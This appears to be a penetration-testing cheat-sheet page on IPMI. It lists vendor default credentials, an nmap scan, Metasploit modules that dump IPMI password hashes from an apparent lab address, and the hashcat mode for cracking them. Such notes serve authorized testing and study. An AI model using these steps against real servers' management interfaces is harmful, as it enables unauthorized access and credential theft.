IPMI - 623(UDP)

Default Passwords :
Product
Username
Password
Dell iDRAC
root
calvin
HP iLO
Administrator
randomized 8-character string consisting of numbers and uppercase letters
Supermicro IPMI
ADMIN
ADMIN

# Nmap ipmi script scan
sudo nmap -sU --script ipmi-version -p 623 wow.nothing.local

# Metasploit Version Scan
msf6 > use auxiliary/scanner/ipmi/ipmi_version 
msf6 auxiliary(scanner/ipmi/ipmi_version) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_version) > show options

msf6 auxiliary(scanner/ipmi/ipmi_version) > run

# Metasploit Dumping Hashes - To retrieve IPMI hashes
msf6 > use auxiliary/scanner/ipmi/ipmi_dumphashes 
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set rhosts 10.129.42.195
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > show options

msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run

# Crack the hash using hashcat
ipmi mode - 7300

PreviousFuzzing NextApplication Enumeration

Last updated 2 years ago